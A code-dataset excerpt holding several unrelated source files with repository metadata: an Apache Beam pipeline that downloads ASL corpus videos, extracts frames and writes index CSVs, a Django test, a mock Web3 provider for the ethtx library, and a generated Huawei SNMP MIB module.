vid_index_schemad_pcoll_partition
| f"Beam PL: {p_label} gather download info for video segments" >> beam.ParDo(VideoSegmentInfoGatherer(d_pl_options))
| f"Beam PL: {p_label} download video segments" >> beam.ParDo(VideoSegmentDownloader(d_pl_options, f"{p_label_indented}"))
)
partition_download_results[i] = p_dl_results
merged_download_results = (
(p_dl_r for p_dl_r in partition_download_results)
| f"Beam PL: merge download results" >> beam.Flatten()
)
return merged_download_results
def pl__4__parallel_extract_target_video_frames(merged_download_results, d_pl_options, n_partitions=8):
"""
# ******************** EXTRACT SEGMENT-FRAMES IN PARALLEL: BEGIN ********************
# NOTE! THIS IS A CRUCIAL PIECE SO PAY ATTENTION TO THE FOLLOWING!!
# ********** --> IMPORTANT VIDEO-FRAME EXTRACTION PROCESSING INFORMATION<-- (BEGIN) **********
# We partitioned vid_index_schemad_pcoll so that video-SEGMENT downloads can occur independently.
# Downloading segments can occur independently since there is no correlation between each segment
# AS FAR AS DOWNLOADING IS CONCERNED.
#
# However, AS FAR AS EXTRACTION IS CONCERNED, each segment is related by the target video composed
# of each segment. The segment-videos themselves are ordered as they compose the final target
# video corresponding of ordered segment videos. For example, if a target video is composed of
# three segment videos, those segments occur in a certain order, as specified by the video index.
# Expanding upon this example, suppose target video "some_story_given_by_john_doe_0.mov", was recorded
# and saved in three corresponding video segments (to save space, I guess?)
# "some_story_given_by_john_doe_0_1.mov", "some_story_given_by_john_doe_0_2.mov", and
# "some_story_given_by_john_doe_0_3.mov". Note that the trailing "0" in the TARGET VIDEO filename
# indicates the camera perspective... all stories are potentially filmed from multiple synchronized
# camera perspectives/angles - there were obvioiusly multiple synchronized video recorders used in
# in that case. However, for this example, we are focusing on the target video for camera perspective 0.
# Anyway, as said, there are three segments which compose the target video. THESE SEGMENT VIDEOS
# ARE ORDERED (in time). THEREFORE, THE FRAMES COMPOSING EACH SEGMENT VIDEO ARE CONSEQUENTLY ORDERED
# (in time). THE BOTTOM LINE IS THAT WE NOW NEED TO GROUP SEGMENT VIDEOS, KEYED BY CORRESPONDING
# TARGET VIDEO. FURTHERMORE, THE COLLECTION OF SEGMENT VIDEOS FOR EACH TARGET VIDEO MUST BE ORDERED.
# THAT IS, WE MUST EXTRACT SEGMENT FRAMES AND SAVE THEM TO THE FILE SYSTEM WITH A FILE NAMING SCHEME
# THAT REFLECTS FRAME ORDER OF THE UNION OF ALL SEGMENT FRAMES. IF WE EXTRACT THE FRAMES OF EACH
# ORDERED SEGMENT, THEN A SIMPLE NUMERIC INDEX AS SEGMENT-FRAME FILENAME WILL DO THE TRICK.
# ********** --> IMPORTANT VIDEO-FRAME EXTRACTION PROCESSING INFORMATION<-- (END) **********
"""
# GROUP segment videos by target video
# note that this depends on the DAG - i.e. will not occur until partition_download_results are ready which, of course, does not occur until all videos have been downloaded
target_vid_seg_frame_extraction_partitions = (
merged_download_results
| f"Beam PL: group extraction info for video segments by target video" >> beam.GroupBy(lambda d: d['target_video_fname'])
| f"Beam PL: partition target video segment info for extraction parallelization" >> beam.Partition(
lambda vid_index_row, num_partitions: random.randint(0,num_partitions-1),
n_partitions
)
)
partition_extraction_results = [None for i in range(n_partitions)]
for i, p in enumerate(target_vid_seg_frame_extraction_partitions):
p_label = f"p{i+1}"
p_label_indented = f"\t{p_label}"
p_extraction_results = (
p
| f"Beam PL: {p_label} extract frames of each segment per target video" >> beam.ParDo(SegmentFrameExtractor(d_pl_options, f"{p_label_indented}", debug=False))
)
partition_extraction_results[i] = p_extraction_results
(
p_extraction_results
| f"Beam PL: {p_label} count target videos processed" >> beam.combiners.Count.Globally()
| f"Beam PL: {p_label} print target videos processed count" >> beam.ParDo(beam__common.PipelinePcollPrinter(label=p_label_indented, msg="target videos processed"))
)
merged_extraction_results = (
(p_extraction_results for p_extraction_results in partition_extraction_results)
| f"Beam PL: merge extraction results" >> beam.Flatten()
)
_ = (
merged_extraction_results
| "Beam PL: apply schema to merged extraction results pcoll" >> beam.Map(lambda x: beam.Row(
video_fname=str(x[0]),
n_stitched_frames=int(x[1])
))
# | "Beam PL: count total frames extracted" >> beam.transforms.sql.SqlTransform(f"SELECT SUM(n_stitched_frames) AS total_frames_extracted FROM PCOLLECTION") # this is VERY, VERY SLOW
| "Beam PL: select n_stitched_frames" >> beam.Map(lambda extraction_results_row: extraction_results_row.n_stitched_frames)
| "Beam PL: count total frames extracted" >> beam.CombineGlobally(sum)
| f"Beam PL: print total frames extracted" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="TOTAL FRAMES EXTRACTED"))
)
return merged_extraction_results
# ******************** EXTRACT SEGMENT-FRAMES IN PARALLEL: END ********************
def run(
max_target_videos,
work_dir,
beam_runner='DirectRunner',
beam_gcp_project=None,
beam_gcp_region=None,
beam_gcp_dataflow_job_name=None,
beam_gcs_staging_bucket=None,
beam_gcs_temp_location=None,
beam_gcp_dataflow_setup_file=None
):
options = None
if beam_runner != 'DirectRunner':
if beam_gcp_dataflow_setup_file != './setup.py':
print(f"*** FATAL ERROR!!! *** beam_gcp_setup_file=={beam_gcp_dataflow_setup_file} but it should be ./setup.py")
return
logging.getLogger().setLevel(logging.INFO) # enable logging only for DataflowRunner
options = {
'runner': beam_runner,
'streaming': False, # set to True if data source is unbounded (e.g. GCP PubSub),
'max_num_workers': 8,
'autoscaling_algorithm': 'THROUGHPUT_BASED',
'num_workers': 4,
'disk_size_gb': 250,
'save_main_session': True,
'enable_streaming_engine': False,
# GCP options
'project': beam_gcp_project,
'region': beam_gcp_region,
'worker_region': beam_gcp_region,
'service_account_email': 'fids-capstone-beam-pl-gcs@sc-fids-capstone.iam.gserviceaccount.com',
'staging_location': beam_gcs_staging_bucket,
'temp_location': beam_gcs_temp_location,
'setup_file': beam_gcp_dataflow_setup_file,
'job_name': beam_gcp_dataflow_job_name,
}
else:
options = {
'runner': 'DirectRunner',
'environment_type': 'DOCKER',
'direct_num_workers': 0, # 0 is use all available cores
'direct_running_mode': 'multi_processing', # ['in_memory', 'multi_threading', 'multi_processing']
'streaming': False # set to True if data source is unbounded (e.g. GCP PubSub),
}
options.update(beam__common.make_fids_options_dict(work_dir, max_target_videos=-1, beam_gcp_project=fidscs_globals.GCP_PROJECT))
n_partitions = 8 # hardcoded for now but we need to retrieve this from beam to be the number of workers
job_suffix = 'boostrap-vid-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = pl__1__bootstrap_target_video_index(pl)
pl__2__write_target_vid_index_csv(full_target_vid_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'download-videos-extract-frames'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
filtered_target_vid_index_schemad_pcoll = pl__2__filter_target_vid_index(full_target_vid_index_schemad_pcoll, pl._options._all_options)
merged_download_results = pl__3__parallel_download_videos(filtered_target_vid_index_schemad_pcoll, pl._options._all_options, n_partitions)
merged_extraction_results = pl__4__parallel_extract_target_video_frames(merged_download_results, pl._options._all_options, n_partitions)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'bootstrap-corpus-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
pl__1__bootstrap_corpus_index(pl)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
# writing the corpus index needs to be in a separate pipeline, which will execute sequentially after the download completes
# note that if we don't do it this way, it is HIGHLY probable that file structure will not be ready
# for reading yet
job_suffix = 'transform-corpus-documents-to-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
corpus_index_schemad_pcoll = pl__1__corpus_document_file_structure_to_corpus_index(pl)
pl__2__write_corpus_index_csv(
corpus_index_schemad_pcoll,
beam__common.GlobalVarValueAssigner(fn_assign_to_global=assign_to_global__raw_xml_b64_max_len),
pl._options._all_options
)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-asl-consultant-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
asl_consultant_index_schemad_pcoll = pl__4__create_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, pl._options._all_options)
pl__5__write_asl_consultant_index_csv(asl_consultant_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-document-asl-consultant-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_asl_consultant_index_csv(pl)
document_asl_consultant_index_schemad_pcoll = pl__5__create_document_asl_consultant_index_schemad_pcoll(
ss_parsed_xmldb_pcoll,
corpus_index_schemad_pcoll,
asl_consultant_index_schemad_pcoll,
pl._options._all_options
)
pl__6__write_document_asl_consultant_index_csv(document_asl_consultant_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-document-asl-consultant-utterance-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
document_asl_consultant_utterance_index_schemad_pcoll = pl__6__create_document_asl_consultant_utterance_index_schemad_pcoll(
ss_parsed_xmldb_pcoll,
document_asl_consultant_index_schemad_pcoll,
pl._options._all_options
)
pl__7__write_document_asl_consultant_utterance_index_csv(document_asl_consultant_utterance_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-document-asl-consultant-target-video-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
document_asl_consultant_target_video_index_schemad_pcoll, document_target_video_segment_index_schemad_pcoll = pl__6__create_document_asl_consultant_target_video_index_pcolls(
ss_parsed_xmldb_pcoll,
document_asl_consultant_index_schemad_pcoll,
full_target_vid_index_schemad_pcoll,
pl._options._all_options
)
pl__7__write_document_asl_consultant_target_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, pl._options._all_options)
pl__7__write_document_asl_consultant_utterance_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, pl._options._all_options)
pl__7__write_document_target_video_segment_index_csv(document_target_video_segment_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-vocabulary-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
vocabulary_index_pcoll, document_asl_consultant_utterance_token_index_schemad_pcoll = pl__6__create_document_asl_consultant_utterance_token_index_schemad_pcoll(
ss_parsed_xmldb_pcoll,
document_asl_consultant_index_schemad_pcoll,
pl._options._all_options
)
pl__7__write_vocabulary_index_csv(vocabulary_index_pcoll, pl._options._all_options)
pl__7__write_document_asl_consultant_utterance_token_index_csv(document_asl_consultant_utterance_token_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-document-asl-consultant-target-video-frame-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
document_asl_consultant_target_video_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_index_csv(pl)
document_asl_consultant_target_video_frame_index_schemad_pcoll = pl__7__create_document_asl_consultant_target_video_frame_index_schemad_pcoll(
document_asl_consultant_target_video_index_schemad_pcoll,
pl._options._all_options
)
pl__8__write_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_frame_index_schemad_pcoll, pl._options._all_options)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'transform-ss-xml-to-document-asl-consultant-target-video-utterance-token-frame-index'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
document_asl_consultant_utterance_token_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_utterance_token_index_csv(pl)
document_asl_consultant_target_video_utterance_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_utterance_index_csv(pl)
document_asl_consultant_target_video_frame_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_frame_index_csv(pl)
document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll = pl__8__create_document_asl_consultant_utterance_token_frame_index_schemad_pcoll(
document_asl_consultant_utterance_token_index_schemad_pcoll,
document_asl_consultant_target_video_utterance_index_schemad_pcoll,
document_asl_consultant_target_video_frame_index_schemad_pcoll,
pl._options._all_options
)
pl__9__write_document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll(
document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll,
pl._options._all_options
)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
job_suffix = 'remove-intermediate-files'
job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
options.update({
'job_name': job_name
})
pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
with beam.Pipeline(options=pipeline_options) as pl:
tmp_dir_path_pcoll = (
pl
| f"Beam PL: create pcoll for {pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR]} cleanup" >> beam.Create([pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR]])
)
beam__common.pl__X__rmdir(
tmp_dir_path_pcoll,
pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
pl._options._all_options
)
video_dir = pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
fs = FileSystems.get_filesystem(video_dir)
if type(fs) == GCSFileSystem:
truly_local_vid_dir_suffix = '/'.join(video_dir.split('/')[1:])
truly_local_vid_dir_root = '/tmp/'+truly_local_vid_dir_suffix.split('/')[1]
truly_local_vid_dir_path_pcoll = (
pl
| f"Beam PL: create pcoll for {truly_local_vid_dir_root} cleanup" >> beam.Create([truly_local_vid_dir_root])
)
beam__common.pl__X__rmdir(
truly_local_vid_dir_path_pcoll,
truly_local_vid_dir_root,
pl._options._all_options
)
print(f"****************************** Finished pipeline job: {job_name} ******************************")
print(f"Beam PL: ALL DONE!")
| 57.282553
| 390
| 0.747455
|
a759d67ec3c2072d95a2e1577e0fcb2fc6d321f6
| 907
|
py
|
Python
|
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
"main testing module"
from django.test import TestCase
# Create your tests here.
class UpdateCurrenciesTestCase(TestCase):
"main test case"
# pylint: disable=missing-docstring, no-member, invalid-name
@classmethod
def setUpClass(cls):
returns = super(UpdateCurrenciesTestCase, cls).setUpClass()
return returns
def setUp(self):
returns = TestCase.setUp(self)
from . import common
common.setup_currencies()
return returns
def test_001_insert(self):
from django.core.management import call_command
call_command('update_currencies')
# Calling twice, as the second time it should exclude it.
call_command('update_currencies')
if __name__ == '__main__': # pragma: no cover
# pylint: disable=wrong-import-position
import django
django.setup()
django.core.management.call_command('test')
| 27.484848
| 67
| 0.689085
|
4359ee0e1268e300e9e555365eeff6709871acbc
| 3,799
|
py
|
Python
|
tests/mocks/web3provider.py
|
tmierzwa/Ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | 1
|
2021-08-02T00:40:38.000Z
|
2021-08-02T00:40:38.000Z
|
tests/mocks/web3provider.py
|
tmierzwa/ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | null | null | null |
tests/mocks/web3provider.py
|
tmierzwa/ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict
from hexbytes import HexBytes
from ethtx.models.w3_model import W3Transaction, W3Receipt, W3Block, W3Log
from ethtx.utils.attr_dict import AttrDict
class MockWeb3Provider:
blocks = {
1: {
"difficulty": 123, # int
"extraData": "test", # HexBytes
"gasLimit": 123, # int
"gasUsed": 123, # int
"hash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"logsBloom": "test", # HexBytes
"miner": "test", # str
"nonce": "test", # HexBytes
"number": 123, # int
"parentHash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"receiptsRoot": "test", # HexBytes
"sha3Uncles": "test", # HexBytes
"size": 123, # int
"stateRoot": "test", # HexBytes
"timestamp": 123, # int,
"totalDifficulty": 123, # int
"transactions": [], # List
"transactionsRoot": "test", # HexBytes
"uncles": [], # List
}
}
txs = {
"0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e": {
"blockHash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"blockNumber": 1, # int
"from_address": "fromasd", # str
"gas": 420, # int
"gasPrice": 1, # int
"hash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # HexBytes,
"input": "jeszcze jak", # str
"nonce": 123, # int
"r": "ds", # HexBytes
"s": "sdf", # HexBytes
"to": "sdf", # str
"transactionIndex": 1, # int
"v": 1, # int
"value": 1, # int
}
}
def add_mocked_block_details(self, block_number, block_details: Dict):
self.blocks[block_number] = block_details
def get_transaction(self, tx_hash, chain_id="mainnet"):
return W3Transaction(chain_id=chain_id, **self.txs[tx_hash])
def get_receipt(self, tx_hash, chain_id):
log_values = AttrDict(
{
"tx_hash": tx_hash,
"chain_id": chain_id,
"address": "test", # str
"blockHash": "test", # HexBytes
"blockNumber": 123, # int
"data": "test", # str
"logIndex": 132, # int
"removed": False, # bool,
"topics": [HexBytes("d")], # List[HexBytes]
"transactionHash": "test", # HexBytes
"transactionIndex": 123, # int
}
)
log = W3Log(**log_values)
values = {
"blockHash": "test", # HexBytes
"blockNumber": 123, # int
"contractAddress": 123, # str
"cumulativeGasUsed": 132, # int,
"from_address": "from", # str
"gasUsed": 123, # int
"logs": [log], # List
"logsBloom": "test", # HexBytes
"root": "test", # str
"status": 123, # int,
"to_address": "test", # str
"transactionHash": "test", # HexBytes
"transactionIndex": 123, # int
}
return W3Receipt(tx_hash, chain_id, **values)
def get_block(self, block_number: int, chain_id: str = None) -> W3Block:
return W3Block(chain_id=chain_id, **self.blocks[block_number])
| 36.528846
| 108
| 0.493024
|
ab86ec2c367b74c273976c5a323677d58bd90fd7
| 10,010
|
py
|
Python
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11
|
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75
|
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module HUAWEI-TDM-PSN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-TDM-PSN-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:37:21 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
HWL2VpnVcEncapsType, = mibBuilder.importSymbols("HUAWEI-VPLS-EXT-MIB", "HWL2VpnVcEncapsType")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
ObjectGroup, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, Counter32, NotificationType, Bits, MibIdentifier, IpAddress, Unsigned32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter64, Integer32, ObjectIdentity, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Counter32", "NotificationType", "Bits", "MibIdentifier", "IpAddress", "Unsigned32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter64", "Integer32", "ObjectIdentity", "Gauge32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
hwTdmPsnMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152))
if mibBuilder.loadTexts: hwTdmPsnMIB.setLastUpdated('200706270900Z')
if mibBuilder.loadTexts: hwTdmPsnMIB.setOrganization('Huawei Technologies Co., Ltd.')
hwTdmPsnMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1))
hwTdmPsnPerfCurrentTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1), )
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentTable.setStatus('current')
hwTdmPsnPerfCurrentEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1), ).setIndexNames((0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPwIdIndex"), (0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPwTypeIndex"))
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentEntry.setStatus('current')
hwTdmPsnPerfCurrentPwIdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPwIdIndex.setStatus('current')
hwTdmPsnPerfCurrentPwTypeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 2), HWL2VpnVcEncapsType())
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPwTypeIndex.setStatus('current')
hwTdmPsnPerfCurrentMissingPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMissingPkts.setStatus('current')
hwTdmPsnPerfCurrentPktsReorder = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPktsReorder.setStatus('current')
hwTdmPsnPerfCurrentJtrBfrUnderruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentJtrBfrUnderruns.setStatus('current')
